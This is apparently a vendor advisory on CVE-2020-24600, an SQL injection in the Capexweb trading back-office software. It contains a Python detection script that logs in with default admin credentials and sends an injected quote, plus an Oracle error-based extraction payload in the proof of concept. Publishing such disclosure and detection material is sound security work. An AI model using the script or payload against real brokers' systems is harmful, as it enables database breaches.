Download Ransomware 2021 Spotlight Report

How to detect CVE- 2020-24600?

Posted on 27th Nov, 2020 | By Bhavithra

A new zero-day vulnerability, CVE-2020-24600, was discovered by Cyber Security Works in Shilpi Soft - Capexweb 1.1 a multiexchange BackOffice Solution for Capital and Derivative Market brokers in India.

This vulnerability was discovered in our research lab on July 01, 2020. Our team has also released a script to detect this vulnerability.

You can use the following script to detect this vulnerability -

 

import os

import sys

import urllib

from urllib import error

from urllib import request

import ssl

from lxml import html

# Ignore SSL certificate errors

ctx = ssl.create_default_context()

ctx.check_hostname = False

ctx.verify_mode = ssl.CERT_NONE

def main():

    if(len(sys.argv) <= 1):

        print("Usage: python capexweb.py <hostname> <port>")

        return

    host = sys.argv[1]

    #default port 443

    port = "443"

    #initializing port

    if(sys.argv[2] != ""):

        port = sys.argv[2]

     #default path

    path = "/capexweb"

    URL = "https://" + host + ":" + port + path

    loginformURI = "/capexweb/capexmain_middle.htm"

    try:

        #Request to fetch login form parameters

        response = urllib.request.urlopen(URL + loginformURI, context=ctx)

        tree = html.fromstring(response.read())

        form = tree.find('.//form')

        action = form.action

        params = {}

        params["dfuserid"] = "admin"

        params["dfpassword"] = "password"

        params["dfcode"] = tree.find('.//input[@name="dfcode"]').value

        params["dfparentdb"] = tree.find('.//input[@name="dfparentdb"]').value

        params["dfparentip"] = tree.find('.//input[@name="dfparentip"]').value

        params["dfinstaldrive"] = tree.find('.//input[@name="dfinstaldrive"]').value

        params["B1"] = tree.find('.//input[@name="B1"]').value

        #Submission of login request and capturing the session-id

        loginURL = URL + action.replace("..","")

        loginargs = urllib.parse.urlencode(params)

        params = bytes(loginargs, "utf-8")

        req = urllib.request.Request(loginURL, params)

        response = urllib.request.urlopen(req, context=ctx)

        cookie = response.info()["Set-Cookie"].split(";")[0]

        #Sending request to get forgotpassword mail along with the captured session-id

        forgotURI = "/servlet/capexweb.cap_sendMail?dfuserid=admin'&dfpanno=&dfsendmode=EMAIL&x=28&y=14&dfcaller=Actual"

        forgotURL = URL + forgotURI

        req = urllib.request.Request(forgotURL)

        req.add_header("Cookie", cookie)

        response = urllib.request.urlopen(req, context=ctx)

        response = str(response.read())

       

        if "ORA-01756" in response:

            print("The {0} is vulnerable".format(URL))

        else:

            print("The {0} is not vulnerable".format(URL))       

    except urllib.error.URLError as e:

        print(e.reason())

if __name__ == "__main__":

    main()

 

Impact

As of today,1390 trading companies use this software as their backend and if this vulnerability is exploited successfully, it may result in unauthorized users’ access to the database and result in a data breach. The vulnerability can potentially enable threat actors to disrupt trade as they move laterally within the network and cause a huge impact on the economy.

Detection

CVE-2020-24600 was detected manually. The GET request parameters in servlet /capexweb.cap_send mail is vulnerable to SQL Injection.

Disclosure

The vulnerability was disclosed to Shilpi Soft on July 01, 2020.

Timeline

Date

Description

 July 01, 2020

Discovered in our research lab

 July 17, 2020

Followed up with the Vendor

 July 29, 2020

Followed up with the Vendor

October 7, 2020        Informed CERT-in about the vulnerability
November 27, 2020        CERT-in confirmed the vulnerability fix

 

Incident Analysis

The CVE-2020-24600 allows an adversary to initiate a SQL injection to access the contents of the database. As per the Google dork results (/capexweb/capexweb), currently, 1390 trading companies use this software.

Vendor

Product

Versions

Shilpi Soft

Capexweb

Capexweb 1.1

 

Vulnerability Analysis

The send mail functionality in forgot password is vulnerable to SQL injection. An adversary can access the contents of the database.

Proof of Concept

Product:  CAPExWeb (A multiexchange BackOffice Solution for Capital and Derivative Market brokers in India)

Product version: Capexweb 1.1

Vulnerable URL: http://www.shilpisoft.com/sunil/corporate.zip

Severity rating: High

CVSS V3 Score: 8.6

Steps to reproduce:

Step 1: Visit the /capexweb/capexweb URL on the server where the capexweb client is installed.

Step 2: Now, fill the login form with invalid credentials and click Submit.

Figure 1: Login form with invalid credentials.

Figure 2: Response shows the credentials are invalid.

Step 3: From error response, click on the “Forgot My Userid or Password” link.

Note: We cannot navigate to the capforgotpassword.jsp directly. As the application takes the user id from the previously submitted request.

Figure 3: Forgot password page with user-id value submitted in login page. Now, click on the Send Request button, and you will receive a Response from the server for an invalid user id.

Figure 4: Replay of forgot password page with user-id value contains a single quote returns ORA string not properly terminated error message from the database.

Figure 5: The payload XORXX’)) or%201=ctxsys.drithsx.sn (1, (select%20sys.stragg(distinct%20banner) %20from%20v$version)) -- in request to retrieve the data from the database in error information.

Figure 6: The available databases in the Oracle database server.

Mitigation

We recommend the following fixes for this vulnerability.

  • Implement input validation for special characters in request parameters before passing to the database for processing.
  • Show a custom error message to restrict the users to see the cause for error at the server end.

Recommendation

We recommend that the vulnerability should be fixed as the severity rating is high and seeks immediate attention. As a workaround, we recommend the trading companies to restrict access to the URLs (/capexweb/servlet/capexweb.cap_sendMail).

Test your defense to know how secure you are…